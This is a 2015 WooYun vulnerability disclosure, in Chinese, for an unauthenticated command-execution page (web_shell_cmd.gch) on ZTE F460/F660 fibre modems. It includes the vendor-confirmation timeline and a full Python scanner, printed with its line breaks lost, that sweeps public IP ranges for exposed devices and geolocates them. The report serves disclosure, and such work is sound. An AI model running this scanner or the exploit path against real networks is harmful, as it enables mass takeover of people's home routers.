乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-15: 细节已通知厂商并且等待厂商处理中 2015-08-15: 厂商已经确认,细节仅向厂商公开 2015-08-25: 细节向核心白帽子及相关领域专家公开 2015-09-04: 细节向普通白帽子公开 2015-09-14: 细节向实习白帽子公开 2015-09-29: 细节向公众公开
未授权访问命令执行
之前看到中兴的多款光猫存在未授权访问导致的任意命令执行,多个实例中均未涉及到F460和F660这两款设备,特意写了个脚本扫描了下,数量不在少数,都是远程80端口直接访问就可以
首先看下两款设备的界面,长得几乎一模一样,只是版本号不同
图上很容易看出来只需要在IP地址后面加web_shell_cmd.gch就可以直接进入命令执行页面,这跟之前其他几款光猫的漏洞一致。扫描了27.151.1.1-27.160.1.1这个段,其他段没去扫,看下扫描结果吧
下面给出扫描脚本的代码:
#!/usr/bin/env python# coding=utf-8# code by 92ez.com# last modify time 2015-05-19 08:50import Queuefrom threading import Threadimport timeimport reimport sysimport subprocessimport jsonimport urllib2#ip to numdef ip2num(ip): ip = [int(x) for x in ip.split('.')] return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3]#num to ipdef num2ip(num): return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24, (num & 0x00ff0000) >> 16, (num & 0x0000ff00) >> 8, num & 0x000000ff)#get all ips list between start ip and end ipdef ip_range(start, end): return [num2ip(num) for num in range(ip2num(start), ip2num(end) + 1) if num & 0xff]#main functiondef bThread(iplist): SETTHREAD = raw_input('Thread: ') print '[Note] Running...\n' threadl = [] queue = Queue.Queue() hosts = iplist for host in hosts: queue.put(host) threadl = [tThread(queue) for x in xrange(0, int(SETTHREAD))] for t in threadl: t.start() for t in threadl: t.join()#get host position by Taobao APIdef getposition(host): try: ipurl = "http://ip.taobao.com/service/getIpInfo.php?ip="+host jsondata = urllib2.urlopen(ipurl).read() value = json.loads(jsondata)['data'] info = [value['country'],value['region'],value['city'],value['isp'] ] return info except Exception, e: print "[Note] Get "+ host+" position failed , will retry ...\n" getposition(host)#create threadclass tThread(Thread): def __init__(self, queue): Thread.__init__(self) self.queue = queue def run(self): global PORT while not self.queue.empty(): host = self.queue.get() try: #print host checktitle(host,PORT) except: continuedef checktitle(host,port): aimurl = "http://"+host+":"+port+"/web_shell_cmd.gch" try: f = urllib2.urlopen(aimurl,timeout = 5) htmlcontent = f.read() f.close() if len(htmlcontent) == 4609: posinfo = getposition(host) title = re.findall(r'<title>(.+?)</title>',htmlcontent) print "Fount "+ title[0].encode('utf8') +" , url : "+ aimurl +" ,extra info :"+posinfo[0].encode('utf8')+" "+posinfo[1].encode('utf8')+" "+posinfo[2].encode('utf8')+" "+posinfo[3].encode('utf8') except Exception, e: passif __name__ == '__main__': print '\nScan ZTE Fxx0 fiber-optic modem program.\n' startIp = raw_input('Start IP: ') endIp = raw_input('End IP: ') port = raw_input('Port: ') global PORT PORT = port iplist = ip_range(startIp, endIp) print '\n[Note] Total '+str(len(iplist))+" IP...\n" bThread(iplist)
限制授权访问
危害等级:高
漏洞Rank:13
确认时间:2015-08-15 06:42
感谢提交,辛苦了
暂无